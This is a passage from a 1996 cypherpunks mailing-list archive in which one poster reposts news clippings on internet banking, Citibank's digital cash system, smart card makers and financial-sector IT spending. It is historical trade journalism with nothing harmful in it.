costs, but also to maintain an edge in an increasingly competitive
market where new entrants and new channels to market are eroding
traditional boundaries.

For example, in the insurance sector, Datamonitor, the market research
firm, predicts that 95 per cent of the UK's largest insurance
intermediaries will have direct operations by 1998. Datamonitor also
believes that by 1998 some 70 per cent of insurance companies will have
Internet sites.

The intensification of competition within the financial services sector
reflects the deregulation of the industry which has attracted new
entrants. Other factors are globalisation and technology which have
swept aside barriers to entry and lowered the cost of doing business.

As a result, in order to thrive in the 1990s, financial service
organisations are as much in the business of managing and manipulating
information as managing and making money.

"Our industry is information based - it is absolutely essential - and
the relationship of technology management, technology usage and business
management is one of the critical skills," says Joseph De Feo, director
of group operations and technology at Barclays bank.

"If people in financial services companies say they don't understand
technology, or are afraid of technology, it is just like saying 'I am
not qualified to do my job'," says Mr De Feo.

The fate of many financial institutions, as they gear up to face this
new competition, will depend on the successful deployment of data
processing resources, telecommunications systems and software.

"The financial services industry is faced with unprecedented challenges
- increasing competition, a technology revolution, a highly
unpredictable economic and political climate, consumerism and rapidly
evolving legislation," said Andersen Consulting in a recent report*.

John Reed, chairman of leading US commercial bank Citicorp, has
expressed concern that banks and securities firms risk being reduced to
"a line or two of application code on a network." Such concerns are
understandable given the competitive pressures that banks and other
financial institutions now face.

"Financial services companies are trying to drive down or stabilise
costs," says Ian Peackock, a consultant with Logica, the UK-based
computer services group. "Another big area for them is systems
integration."

"When the banking history of this century is written, the decade from
1990 to 2000 will be seen as the defining moment," said Price Waterhouse
in a recently published report on the challenge of virtual banking. "A
new generation of non-bank competitors poised to harness new forms of
technology could radically alter the structure of the traditional
banking system as we know it. Today, opportunities are being exploited
by software companies, consumer companies and even large and influential
media owners. The threat to the traditional 'bricks and mortar' banking
system is very real."

In America, US telecoms group AT&T became the second-largest card issuer
in the world with more than 15m accounts in just five years. Ford Motor,
which now generates 20 per cent of its US revenues from financial
services, now positions itself in the UK as "the branchless bank".

Business Week magazine noted: "Banking is essential to a modern economy.
Banks are not" -a view echoed by Bill Gates, chairman of Microsoft, who
warned: "Banks are dinosaurs. Give me a piece of the transaction
business and they are history."

Meanwhile, the IT specialists at Deloitte & Touche argue that
"Technology will change the retail banking industry fundamentally in the
years to come." They believe that banks will lose their monopoly as
centres for money transmission - in other words, the activity of
transmitting money from one person or company to another will
increasingly be carried out by a variety of competing providers.

In addition, distribution channels for retail banking products will
proliferate.

"Whereas in the past the bank branch was the only channel for
distributing most financial services products, in the future a number of
different channels will continue to erode the branch's predominance,"
say Deloitte & Touche. Finally they argue that the fully integrated bank
will fragment into specialist categories.

Braxxon Technology, an IT management and systems consultancy, estimated
recently that leading international banking institutions face a combined
IT bill of $ 4bn to replace their existing global trading settlement
systems for bonds and equities. After a survey of large banks, Braxxon
concluded that the top 50 world investment banks would need a global
investment of at least $ 80m each to replace existing settlement systems
which have failed to keep pace with business and regulatory
requirements.

The survey also revealed that 30 per cent of banking systems are more
than 10 years old - and three out of every five banks have already
started replacing their systems.

Financial institution spending on IT is also likely to be increased over
the next few years in order to tackle issues such as the so-called
millennium problem which affects older software, much of which is
running on mainframe machines.

Ultimately, as the worlds of information processing and financial
services collide, most financial institutions realise that they have
little choice but to increase their IT expenditure while ensuring that
they use technology as efficiently as possible to deliver their
customers fast, flexible and competitively priced services.

*Financial Services in a Virtual World.


Forbes ASAP: August 26, 1996

The Money Changers: Digital cash Innovators

Sholem Rosen: Citibank V.P., Emerging Technologies

SHOLOM ROSEN heads Citibank's emerging technologies group, which has
devised a digital cash system. Rosen invented the technology, slated to
be released in late 1998, that will make possible the electronic
management of cash. The 55-year-old Rosen, a former math professor at
Johns Hopkins University, talked with FORBES ASAP's Lee Patterson about
Citibank's digital cash plan.

ASAP: What has Citibank developed that's different from other electronic
money technology?

ROSEN: We've developed EMS, which stands for Electronic Monetary System.
It allows you to transact personal or commercial business without the
need of a third party. If you pay me $10 for a good or service, the
money goes directly to me -- it doesn't go through a bank. EMS supports
all currencies, so you could pay someone in yen, dollars or marks. In
our system, the money circulates just like cash, except our "EMS note"
carries a complete audit trail. If your e-money is lost or stolen, it
can be redeemed.

ASAP: Software companies are aggressively pursuing the electronic
commerce and banking markets. How do you think Citibank's name will
stand up to the likes of Microsoft or DigiCash?

ROSEN: Citibank understands consumer marketing. Every card in my wallet
has the Citibank brand name on it. You may not lie loyal to your bank
yet, but the idea is to make you loyal by providing services that make
your life a lot easier.

If Microsoft or another software company wants to be a competitor, it's
still going to have to sign up with banks to do business. Internet money
is not going to be of any value if you can't turn it into real money you
can use in the physical world. You have to go through the banking system
to do that.

ASAP: How did you feel a year ago when you heard the plans for a
Microsoft/Intuit merger?

ROSEN: Personally, I didn't think much of it at all. I believe banks are
more concerned they'll be captive to what technology companies deliver
to the consumer rather than having their businesses taken over.

ASAP: But why will consumers come to Citibank for their technology needs
when they can go to Microsoft or Intuit?

ROSEN: Because Citibank has better technology. We give away our home
banking software, and it's much more functional than anything you're
going to pay to get from Intuit. Technology companies are definitely
competition, but we have been approaching electronic money from an
application standpoint and applying technology to it -- not the other
way around.

ASAP: Much of the focus of e-money technology centers on security. How
secure is Citibank's system?

ROSEN: Security has to be in the hardware, not the software. Our
security is built into a proprietary chip we've developed. We're going
to use cryptography that only national labs will be capable of breaking.
I would let all the hackers in the world take their cracks at our
system.

ASAP: Will e-money replace the coin and papernote system we use today?

ROSEN: We're not here to replace paper money. Our system will be
valuable on the Net. Internet transactions are flaky now. We're trying
to take the flakiness out of it. We want to give the user more of the
feeling of trust and security experienced in the physical marketplace.

ASAP: What's the federal government's role in electronic money?

ROSEN: They're watching. They're letting people experiment. The official
party line is "We're going to keep our hands off and our nose in."

ASAP: Will digital cash make it easy to launder money or evade taxes
offshore?

ROSEN: It's true that with e-money, geography is gone. All the laws that
have been created here and abroad have been based on geography.
Two-thirds of our currency now is abroad. So what's the big deal if
[e-money] moves abroad? With our system, the feds will have a lot more
control over what's going on than they do with the present paper
currency system. EMS notes will leave electronic audit trails, and their
circulation can be blocked if the system detects that they've been
tampered with or duplicated.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 18 Sep 1996 16:18:36 +0800
To: cypherpunks@toad.com
Subject: [NEWS] Crypto-relavant wire clippings
Message-ID: <BRJFuD98w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Financial Times: Thursday, September 5, 1996

Banking on the Internet: Any Time, Anywhere

By George Cole

When Claus Nehmzow wants to check his bank statements or pay a bill, he
simply switches on a personal computer. He can also transfer money
between accounts and make electronic payments from almost anywhere in
the world because his bank is on the Internet, the worldwide network of
computers.

Nehmzow, a principal with the management and technology consultancy firm
Booz-Allen & Hamilton, says: "I live in England but my account is in the
US. If I can find a computer that's linked to the Internet, I can access
my account any time and anywhere."

About 50m people have access to the Internet but this number is expected
to reach 200m within two years. This huge audience, the ability to offer
a 24-hour service across borders and the potentially enormous savings in
operational costs, have prompted many banks and financial institutions
to consider hooking up to the Internet. But while the Internet offers
many advantages, one issue makes many banks nervous -- security.

The potential of millions of people gaining unauthorised access to
sensitive financial information on the Internet, and then using it to
commit fraud is so great that few banks are prepared to offer online
services.

A survey by Booz-Allen found that more than 600 banks had sites on the
Internet's World Wide Web. However, almost three-quarters of the banks
simply used their sites as "electronic brochures" to promote their
services. Only 2 per cent of European banks and 1 per cent of US banks
offered full banking services on the Internet.

"Security is holding back many banks, but the sheer economics of the
Internet will see many of them offering services on it," says Michael
McConnell, vice-president of Booz-Allen. "The cost of an Internet
banking transaction can be measured in cents, while the same transaction
at a bank branch costs dollars. You can't ignore these kind of savings."


Piero Verdiani, vice-president of Olivetti Systems and Services'
professional services division, says the Internet offers an average
saving of $1.20 per transaction when compared with using a traditional
bank branch. "For a customer who makes five transactions a week this
works out at $300 a year. A bank with 100,000 customers could
potentially save $30m a year," he says. Nehmzow believes that many of
the concerns about security are more an issue of perception than of real
obstacles: "People hear about hacking and get worried. Yet many people
will happily give their credit card numbers over the phone, knowing that
if anything should go wrong, their credit-card company will accept most
of the liability. The same could happen with electronic banking."

Some banks have opted for privately-owned online services rather than
the Internet. The UK-based TSB bank, for example, offers its customers
an electronic-banking facility called PC Banking, through the CompuServe
online service. "It's a step-up from the Internet in terms of security,
but in the long term, the Internet will be an important agent for
financial services," says Bill Goodland, product manager for
CompuServe's financial services division.

Barclays is piloting a similar PC-based banking service for personal
customers. The system, launched in February and developed with Visa
Interactive, runs from Barclays software on a Windows-compatible PC and
modem from customers' homes or offices.

The attraction of the Internet is that users do not need to access
proprietary PC banking software or special online services to carry out
banking transactions. Nehmzow's electronic bank is the Security First
Network Bank, based in Atlanta, Georgia. SFNB, which claims to be the
first Internet bank, opened for service in October 1995. It has more
than 2,000 customers, mostly professionals aged between 26 and 55.

The SFNB uses a number of security features, which include issuing each
customer with a personal identification number (Pin) and encrypting or
scrambling any data that is sent over the Internet. The bank's internal
computer network is protected by a "firewall" which filters all
electronic traffic.

This month, the US bank First City Bank and Trust plans to launch an
Internet banking service using similar security facilities. In the UK,
Midland Bank is working with Microsoft in order to offer Internet
banking.

Olivetti, and Sparekassernes Data Center, a consortium of 80 Danish
savings banks, have formed a joint venture called FIT (Financial
Internet Technology). FIT has developed E-Bank (Electronic Bank), a
system which uses the Internet for banking from home, and offers various
levels of security, including passwords, PIN codes and encryption.

Some believe that Internet banking will take off when there is
widespread use of a technology known as public-key cryptology. A key is
a complex mathematical number that may be many hundreds of digits in
length, creating hundreds of billions of potential combinations.

The key is divided into a public key and a private key. The public key
is available to anyone, and may be printed in a directory or even posted
on to the Internet. The private key is kept secret by the owner. A
message is sent to the owner by encrypting it with his or her public
key. Only the correct private key can decrypt it.

The public-key system also makes it possible to produce a "digital"
signature. "This is important, because a bank will need to be confident
that it is communicating with the genuine customer, and the customer
needs to be certain that he's dealing with his bank," says McConnell.
"It also provides proof that the customer authorised a particular
transaction."

A digital signature is created by the sender, who encrypts part of the
message with his or her private key. The recipient of the message uses
the sender's public key to decrypt the segment and thus confirm the
identity of the sender. The system will automatically operate whenever a
message is being sent or received over the Internet.

Public-key systems will also be used for credit-card transactions. Visa
International and Mastercard International have joined forces with a
number of companies including GTE, IBM, Microsoft and Netscape to
develop SET (Secure Electronic Transactions) which will allow users to
make secure credit-card payments over the Internet: "It will mean that
someone making a $ 10 transaction won't get billed for $10m," says
Bernard Ovink, senior manager of Visa's electronic commerce division.
SET is due to come into operation in late 1997.

There are many encryption systems available, including several developed
by RSA Data Security, based in Redwood California. RSA is providing the
encryption technology for SET. The power of a key is measured in bits -
an eight-bit key offers 256 possible combinations, while a 40-bit key
has more than 1,000bn combinations.

Some 40-bit keys have been cracked by cryptology enthusiasts, causing
some to question the security of public-key systems. But McConnell says
this fear is misplaced: "It took months to crack each key and a
tremendous amount of computing power. But the question is: was it worth
all the effort? It's like spending $100 to counterfeit a $ 20 bill."

McConnell foresees a time when many people will have their own public
and private keys: "I think you'll get an agency such as the Post Office
distributing the keys to the public, and then financial organisations
will use them to create online banking and other services. This is going
to happen sooner than some people think." .


American Banker: Thursday, September 5, 1996

OCC Allows Internet Access Plan, Eyeing Competitive Edge
for Banks

By OLAF de SENERPONT DOMIS

A small bank in Pennsylvania has won the first regulatory approval to
sell Internet access to the public, which could attract customers to
on-line banking and other electronic services.

The decision, released Tuesday by the Office of the Comptroller of the
Currency, could help national banks compete with nonbank providers of
on-line financial services, experts said.

"The OCC is aggressively pushing the envelope with this decision,
because it's allowing a service not directly related to banking," said
Charles M. Horn, a partner at Mayer, Brown & Platt, a Washington law
firm. "It is part of a natural progression toward letting banks expand
the way they provide financial services."

"The comptroller has recognized the critical importance of technology to
the future of the banking industry," agreed Robert G. Ballen, a partner
at the Washington law firm Schwartz & Ballen. "This is consistent with
the comptroller's concern that banks be able to effectively compete with
nonbanks."

In an Aug. 19 letter to Apollo Trust Co. in Apollo, Pa., the OCC told
the $105 million-asset bank it could sell general Internet access to
anyone in its western Pennsylvania service area. The bank also was given
permission to give free Internet access to schools, government offices,
libraries, churches, and various nonprofit organizations.

"We have a long-standing precedent of allowing banks to use the excess
capacity of their physical facilities, and this ruling translates those
old precedents into the technology world," Comptroller Eugene A. Ludwig
said in an interview Wednesday. "Making sure that banks use things as
efficiently as possible is a win-win for everybody - the bank, its
customers, and the community.

"This is very symbolic of how the use of the electronic media can help
banks of all sizes provide products and services to customers."

Viveca Ware, director of payment systems at the Independent Bankers
Association of America, said, "Not only does this open the door for
banks to compete with nonbank Internet service providers, it opens up a
whole new realm for banks to offer new services to their communities."

Separately, the OCC approved a request by Huntington National Bank in
Columbus, Ohio, to enter into a joint smart card venture with the
Student Loan Marketing Association and Battelle Memorial Institute, a
Columbus, Ohio-based technology research organization.

Huntington has said the venture, to be based in Columbus and named
Cybermark, will develop, market, and maintain stored-value card systems
for self-contained communities such as universities, hospitals, theme
parks, and military installations.

Apollo already allows its customers to transfer funds, apply for loans,
and view account balances via the Internet. Apollo purchased powerful
computer equipment to provide these services and has the excess capacity
to provide a gateway to the Internet.

Ray Muth, the bank's executive vice president, said Apollo plans to
entice new customers to its computer banking products by offering
Internet access.

"This is an absolutely golden opportunity for us," Mr. Muth said in an
interview. "We'll increase our profitability by developing new customer
relationships."

The OCC concluded that offering Internet access to the public is part of
the business of banking because it satisfies three criteria. First, it
allows banks to provide more convenient service to customers. Second,
the OCC argued that full Internet access is needed to let banks market
their electronic banking services. Third, the OCC said that because the
computer hardware Apollo purchased had extra capacity, the bank ought to
be able to use it profitably.

In the interview, however, Mr. Ludwig said banks cannot purchase
computer equipment solely to offer customers Internet access.



News Release(Online Resources): Wednesday, September 4, 1996

Online Resources to Provide Transaction Link to AOL

Online Resources & Communication Corporation, one of the leading
providers of interactive financial services, announced today that it has
entered into an agreement with America Online Inc., the world's largest
consumer online service, to provide financial transaction capabilities
to America Online's more than six million members.

This agreement coincides with the launch of the AOL Banking Center, a
focal point that gives AOL members access to financial institutions who
participate in the AOL Banking Center.

AOL members may visit their financial institution's virtual branch that
resides within the AOL Banking Center.

Online Resources will have a direct link to AOL, enabling clients who
participate in the AOL Banking Center to offer real-time banking, bill
payment and other transaction services to AOL members.

"The power of transaction processing cannot be understated," said Online
Resources CEO Matthew P. Lawlor. "The AOL members will return to their
virtual branch again and again if it is their site for moving money,
paying bills and getting current personal financial information. The
cross selling opportunities for participating financial institution are
enormous."

Ted Leonis, president of the AOL Service Company, said, "Online
Resources is one of the leading interactive financial services providers
in the industry.

Its focus on financial institutions and their transaction capabilities
nicely complement our focus on consumers and their desire for
value-added services."

Online Resources provides consumer access to its financial institution
customers through the PC via its PC Windows-based software or the World
Wide Web, and through its ScreenPhone and touch tone telephones. AOL
members requesting transactions or personal financial information from
their virtual branch will seamlessly link-up to their financial
institution through Online's Web site and return to the virtual branch
in the AOL Banking Center when they have finished.

America Online Inc., (NASDAQ Symbol: AMER), based in Dulles, Virginia,
is the largest consumer online service in the world, with more than 6.2
million members worldwide. Through its services, AOL offers its
subscribers a wide variety of services including electronic mail,
conferencing, software, computing support, interactive magazines and
newspapers, and online classes, as well as easy and affordable access to
services on the Internet. Founded in 1985, AOL today has a global work
force consisting of more than 5,000 people.

Personal computer owners can obtain America Online software at major
retailers and bookstores or by calling 800/827-6364.

McLean, Va.-based Online Resources & Communications Corp. is a privately
held company founded in 1989. It specializes in providing home banking,
bill paying, investment and other financial services to financial
institutions for resale under their own brand to consumers and small
businesses.

Online's clients include banks, brokerages, credit unions, ATM networks
and other financial service providers. Currently, Online has 40
institutional clients. Online provides financial institutions with
extensive support services, such as consumer marketing, call center bill
paying software or service, security and communications network
management. Users of Online's services may access their financial
institution through a variety of devices, including the PC, conventional
telephones or the company's low-cost ScreenPhone.

Easy, low-cost access to a variety of interactive financial services is
supported through either private commercial networks or through the
Internet. Online's Web site is www.orcc.com.


News Release (Sanwa Bank): Wednesday, September 4, 1996

Sanwa Among First In U.S. to Offer AOL Subscribers Intuit Software

Sanwa Bank California today became one of the first banks in the United
States to offer online banking and bill payment to the more than 6
million subscribers of America Online (AOL) through a new computer
program developed by the nation's leading maker of personal financial
software.

Developed by Intuit Inc., which also makes Quicken(R), the nation's most
popular personal finance software, the new service has been dubbed
BankNOW(TM) and is available to current Sanwa Bank customers who are
subscribers to America Online, as well as to new customers who sign-up
with America Online and Sanwa Bank.

In conjunction with the introduction of BankNOW, Sanwa Bank has
established a site on America Online to give current and prospective
customers product and service information, as well as a point-and-click
option for opening a new account. The BankNOW software can be downloaded
from Sanwa's site on AOL free of charge.

Sanwa helped pioneer PC banking a year ago when it teamed with both
Intuit and Microsoft Corp. to offer customers a PC home banking option.
At the same time, it launched its site on the World Wide
Web(http://www.sanwabank.com), one of the first to offer consumers the
option of applying for loans, credit cards and other services through
the Internet.

"BankNOW is online banking software created expressly for convenience-
oriented PC users who want a fast, simple and hassle-free way to conduct

online banking and payment transactions," said Kathleen Graham, vice
president for retail banking at Sanwa. "It is a natural outgrowth of our
already state-of-the-art electronic banking capability."

Sanwa customers who sign-up to use BankNOW will have the following
options available:

-- Access to accounts day or night.

-- Reconcilement of accounts automatically.

-- Review of account balances.

-- Online transfers between linked accounts.

-- Write checks and pay bills to anyone or any creditor in the U.S.

-- Send e-mail to communicate with Sanwa.

As an additional inducement to sign-up, and in conjunction with its One
Market Value account, Sanwa is offering a package of incentives,
including fee-free ATM withdrawals at all STAR(R) and CIRRUS(R)
locations, fee-free online banking and bill payment for 12 months, free
checking for a year, no-annual-fee credit cards and no-annual-fee
overdraft protection.

On the business side, Sanwa's small business customers also will benefit
if they sign-up for the BankNOW feature. Current and new customers, who
have standard small business accounts, will receive 12 months of free
online banking through BankNOW. Among other available options to small
business customers are a direct e-mail link to the Sanwa branch manager
assigned to their account and online banking at the special reduced rate
of $7.95 for the first 12 months. This special reduced price includes
eight online banking sessions and 20 bill payments per month.

"We believe this alliance will bring user-friendly electronic banking to
millions of consumers -- both personal and small business -- who might
not otherwise have ever considered it," said Doug Stewart, first
executive vice president. "It is another step toward reinforcing our
campaign to remain one of the leaders in electronic banking throughout
the U.S."


American Banker: Thursday, September 5, 1996

On-Line Banking: Comerica Worker Moonlights in
Cyberspace

By JENNIFER KINGSON BLOOM

By day, Frank De Armas is a foot soldier in Comerica Inc.'s information
systems department.

By night, he sheds his pinstripes, grabs his mouse, and becomes host and
editor-in-chief of The Internet Banker, an on-line magazine, bulletin
board, and resource center for people interested in what banks are doing
in cyberspace.

"It's like a clearing house for information on banking," Mr. De Armas
said. "It started out as a little, tiny, part-time thing, but it just
keeps growing."

So much so that Mr. De Armas, a senior applications engineer for
Detroit-based Comerica, now spends four hours a night at his home
computer maintaining the Internet Banker site.

He said it takes an hour to check all his links to other bank-related
sites and to make sure that all the banks clamoring to be connected are
added to the growing list.

The other three hours are spent compiling a daily on-line banking
newsletter, assembling a quarterly journal, and responding to questions
that readers tack onto the site's bulletin boards. "If I know the
answer, I post it," he said.

The site grew out of Mr. De Armas' development last year of Comerica's
Web site. He wanted to keep track of what other financial institutions
were doing on the Internet, adding bank- and financial-related sites as
he came across them.

Then other people discovered his site and started using it. What began
as a research tool "has taken on a life of its own."

Bankers use the bulletin boards for global shop talk. In a recent
posting, a Missouri banking regulator wrote to ask about the delivery of
electronic banking services to rural areas. An Israeli economics student
asked if people think the Internet will make "normal banks as we know
them today disappear."

A New Zealand banker named Lew solicited tips on boosting staff morale
during a merger. A banker from Connecticut named Tom responded that
"communication" and dress-down days had helped morale during his bank's
merger.

Then Mr. De Armas weighed in. "Tom has a good point," he wrote.
"Anything you can do to make the employees feel more at ease will help.
Stress is a natural byproduct of mergers." Trading insights has been the
hobby's greatest pleasure for Mr. De Armas, an affable 35-year-old who
taught himself to program computers in the Basic language while on
injury leave from the Army.

Mr. De Armas now knows several programming languages, and is an on-line
veteran. "I was probably one of the only ones who used to get on chat
lines on Prodigy at 1,200 baud," he recalled.

His Web site radiates enthusiasm for the medium. In a page of tips about
how to design a good site, he offers suggestions on how to link an
electronic-mail address to a Web page, deftly suggesting: "The HTML code
for this is easy." (HTML, or hypertext markup language, is the design
language for Web sites.)

For the less computer literate, Mr. De Armas' site offers a readable
electronic magazine -- which he writes and edits -- on Internet-related
banking issues. A recent issue included a question-and-answer session
with one of the designers of BankAmerica Corp.'s Web site and a review
of the site -- both presented in Mr. De Armas' effusive style.

"You can't help but be impressed with BofA's site," he wrote in his
review. "I tested the response time of the site at 9,600, 14,400,
28,800, and of course our leased line. ... My congratulations to the
staff of BofA for a fine site."

Stephen Hugley, senior vice president and manager of information
services at Comerica, calls Mr. De Armas "one of our more literate
client/server technicians.

"He was instrumental in putting together our Web site, and he is also
instrumental in helping other areas of the bank when they have Internet-
type questions or issues," Mr. Hugley said.

"It's a joy to work with somebody like Frank because he really has a
good vision of where the Internet is going and what it's value will be."

The Internet Banker site (www.ddsi.com/banking/), which now fields more
than 20,000 hits a week, has won two awards and garnered several
speaking invitations for its creator.

Mr. De Armas' wife, Janice, runs a companion Web site called Metro
Online, which contains information and listings about Detroit-area
happenings.

"You meet all kinds of people on the Web - it's amazing," Mr. De Armas
said. "Just think of it as a big neighborhood."

Among his electronic acquaintances is Tony Plath, director of the
University of North Carolina's Center for Banking Studies. Mr. Plath's
banking students use the Internet Banker site to collaborate on
projects.

"The real value in Frank's Web board is that a lot of bankers are point-
and-click type Web users - they don't know how to post their own home
page in HTML, and they don't have time for it," Mr. Plath said. "This
allows you to post messages that people can read and to maintain threads
of discussion."

Bradley Streeter, a community reinvestment and development specialist
with the Kansas City, Mo., outpost of the Office of the Comptroller of
the Currency, views the Internet Banker site as a "wonderful research
tool."

"I was interested in how banks are using the electronic forum to reach
low and moderate-income people," he said. "It helped inform me on what
other people are thinking about the issue."

Bill Burnham, a banking consultant at Booz-Allen & Hamilton, uses the
site regularly. "I check it because they catalogue the top 100 banks on
the Internet," he said. "I refer people to it as well."

Most of the site's content is free, but Mr. De Armas does charge for his
daily newsletter. Colleagues at Comerica receive complimentary
subscriptions.

And he has been attracting sponsors to his banking site. One advertiser,
the principal of a Detroit-based brokerage firm, said the response has
exceeded newspaper ads.

"I was amazed," said the principal, Michael H. DeLap. "I thought I would
put something out there in cyberspace and never hear anything about it
again."

Mr. De Armas is not the first person whose professional interests led
him to develop his own cottage industry. Comic strip fans can look to
Scott Adams, the creator of "Dilbert," as someone who created an
unlikely career out of a straitlaced corporate job - at Pacific Bell.

Mr. De Armas said he is content to stay in banking and enjoy the kudos
on his Web site. "They love it here at Comerica," he said. "My
management is really happy. It showed a little initiative."

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 18 Sep 1996 15:10:13 +0800
To: cypherpunks@toad.com
Subject: [NEWS] Crypto-relevant wire clippings
Message-ID: <VTJFuD99w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


American Banker: Tuesday, September 10, 1996

Two German Companies Tap U.S. Smart Card Market

By VALERIE BLOCK

Two German smart card manufacturers that have set their sights on the
United States are finding the market big enough for two different
strategic approaches.

Gieseke & Devrient America Inc., subsidiary of a German currency
printer, has become a major supplier of Visa Cash cards, firmly
entrenching itself in the world of banking applications. Orga Card
Systems Inc., whose German parent is owned by three corporations in that
country, is going after the telecommunications industry here.

In August, Orga secured a million-card minimum commitment from Omnipoint
Corp. for the new digital mobile phone technology known as personal
communication services. The deal, covering the New York area, could mean
as many as three million cards over three years.

Smart cards, with embedded computer chips, contain customer account
information and would be used to activate the mobile phone. Orga inked a
deal last fall with American Personal Communications, another provider
of personal communications services, to supply smart cards for its
Sprint Spectrum service in the Washington area.

"We're big in telecommunications," said Holger Mackenthun, president of
the U.S. Orga operation in Paoli, Pa. "That's where most of the (smart
card) applications are."

Benjamin Miller, chairman of CardTech/SecurTech, the Rockville, Md.-
based conference organizer, called Orga a "major worldwide player" in
global standard for mobile telecommunications, or GSM, the international
version of the digital mobile phone network.

Gieseke & Devrient, with a 150-year history of currency printing,"is
tied culturally to the financial industry," said Joseph Schuler, senior
vice president of Schlumberger, a leading French smart card company with
operations here. Schlumberger and its home-country competitors, Gemplus
and Bull Group, supply the lion's share of smart cards in the United
States and around the world.

Still, Mr. Schuler said the expansion of the U.S. market will create
opportunities for all the manufacturers.

In Supplying 800,000 cards to NationsBank for the Olympics Visa Cash
pilot in Atlanta, Gieseke & Devrient established a firm alliance with
Visa. It is vying to participate in the New York smart card test
scheduled to begin early next year with Visa, MasterCard, Citicorp, and
Chase Manhattan Corp.

The German company also supplied card-dispensing machines to Wachovia
Corp. for the Atlanta pilot and 5,000 Visa Cash cards for BankAmerica
Corp.'s limited-edition Olympic series. R. Kirk Brafford, program
manager, Gieseke & Devrient in Reston, Va., said since his hiring in
1994, he has laid groundwork, established relationships, and generally
spread the word about the company.

"Things started to kick in last fall with Visa Cash," he said. While
profits have not yet materialized for U.S. operations, its German
parent, Gieseke & Devrient GmbH posted $240 million in card revenues for
1995. Orga's German parent, Orga Kartensysteme GmbH, garnered $85
million in card revenues for 1995.

Mr. Brafford said Gieseke & Devrient has been a global standard for
mobile telecommunications pioneer in Germany and elsewhere. It competes
for personal communication services applications as well as prepaid
phone cards and other telecommunications applications, but it has been
held back by a fastidious "quality orientation," said Mr. Miller.

Over-the-air initialization for digital mobile communications had not
been standardized, so Gieseke & Devrient didn't offer the feature that
other companies, like Orga, promoted through proprietary means.

Mr. Brafford said a standard was recently put in place, and the company
will offer the feature soon. He also said the organization is working
with several satellite communications companies to supply smart cards
for their activation systems.

Orga -- owned by Preussag, a giant German steel maker; Bundesdruckerei,
a federal printing company comparable to the U.S. Mint; and Detecon, a
consultancy owned by Deutsche Telekom, Deutsche Bank, and Dresdner Bank
-- was formed 11 years ago as a smart card producer for global standard
for mobile telecommunications and prepaid phone applications. It has
been less aggressive in the financial services industry.

Several industry sources said Preussag is dissatisfied with the company
and wants to divest. Mr. Mackenthun said the steel maker may indeed sell
its shares to the other two owners, to better concentrate on its core
business.

Orga also suffered a setback in its attempt to secure a card
manufacturing base in the United States. It announced a joint venture
last year with Kirk Plastic Co., which could have given Orga a U.S.
presence similar to those of Gemplus or Schlumberger. That deal fell
through, and last month Kirk Plastic, the second-largest bank card
producer in the United States, was sold to Francois-Charles Oberthur, a
French currency printer that co-owns a smart card operation with Bull
Group.

Kirk Hyde, president of Los Angeles-based Kirk Plastic, said Orga was
stumbling in the banking arena, but other observers said financial
differences split the companies.

Though Orga supplied 20,000 reloadable, stored-value cards for
MasterCard's Australian smart card pilot, the company is not bidding on
the New York test. Mr. Mackenthun said that was because it cannot
produce cards and personalize them here.

Still, Mr. Mackenthun is optimistic that Orga will either purchase
another plastics maker or set up personalizing facilities of its own in
the near future.


Gieseke & Devrient acquired Security Card Systems of Toronto earlier
this year and has a plant in Mexico City. It expects to purchase a U.S.
facility as well. Through its Toronto facility, it will manufacture
cards for Mondex's Canadian issuers.



InformationWeek: September 9, 1996

Wall Street Sharing Data To Get An Edge

By Udayan Gupta

If you listen to all the media stories about Wall Street and technology,
you may come away convinced that preparing systems for the year 2000 is
subsuming all other technology projects in the financial community.

Nothing could be further from the truth. Sure, making the year 2000's
two-zero datefields work is a nagging headache. But a bigger concern for
Wall Street is how to keep pace with technology without tearing apart
the whole organization. How does a company adopt the latest systems and
software, train users, and still not miss a beat in its regular
business?

The choice for many financial services companies is to expand the use of
and access to technology within the organization, focusing on
connectivity and improved productivity. "We aren't slowing down on the
introduction of technology. We simply are stepping up our technology
training," says Howard Sorgen, CIO at Merrill Lynch & Co. in New York.

Speed and data availability have been the key competitive elements for
financial services companies. To gain an edge in these areas, companies
have experimented with a wide array of technology. But such
experimentation has takenplace with little internal coordination,
leaving large financial institutions with disparate and confusing
systems.

Not surprisingly, financial services companies are consolidating their
technology, says Jim Ogorchock, business development manager for
financial services at EMC Co., a Hopkinton, Mass., data storage
provider. Consolidation has meant finding ways to disseminate data and
information across the enterprise and making data easier to use, he
explains. There is greater emphasis on data warehousing, for example,and
on finding ways to make data more accessible.

ESI Securities Co., a New York broker that specializes in trading
technology, is also looking for ways to make data more accessible to
more people. "We have moved from being a linear information process to
an integrated process," says Jeanne Murtaugh, ESI's vice chair. Instead
of different people handling data at various points in the chain, one
person can have access to all data at once, dramatically cutting the
time it takes to act on the data.

At many financial institutions, the focus is on expanding choice and
connectivity, says Murtaugh. ESI has found that there is big demand for
its trading products and services because they give users greater
flexibility and are compatible with other systems.

Not The Enemy

Connectivity also is being sought through the Internet, says Matt de
Ganon, president of K2 Systems, a New York Internet access designer.
"Financial services companies are recognizing that the Net isn't an
enemy competing to provide services. It's an additional conduit," de
Ganon says. He adds that a growing number of financial services
companies are willing to use the Internet to provide data to investors.

The Internet is also seen as a transactional tool, one that allows data
gathering and information dissemination at a more rapid and
cost-efficient rate. Equifax Inc., for example, plans to make credit
data available to its subscribers on the Net, providing easier access to
the data at vastly reduced prices, says Dan McGlaughlin, president and
chief technology officer of the Atlanta company. Equifax keeps credit
information on nearly 200 million U.S. consumers.

Acceptance of the Internet as an integral business tool is only part of
the change at financial services companies. Many of them are abandoning
proprietary software and hardware for more generic solutions, especially
if those solutions provide the choices and connectivity that companies
need. Technology users are searching for a common platform that can
provide ready solutions and is easily scalable, says Jonathan Wolf, VP
of marketing and sales for Track Data, a New York provider of market
data systems.

Increasingly, IT executives at financial services companies are looking
at a Windows NT environment, Wolf says. Many of the companies that
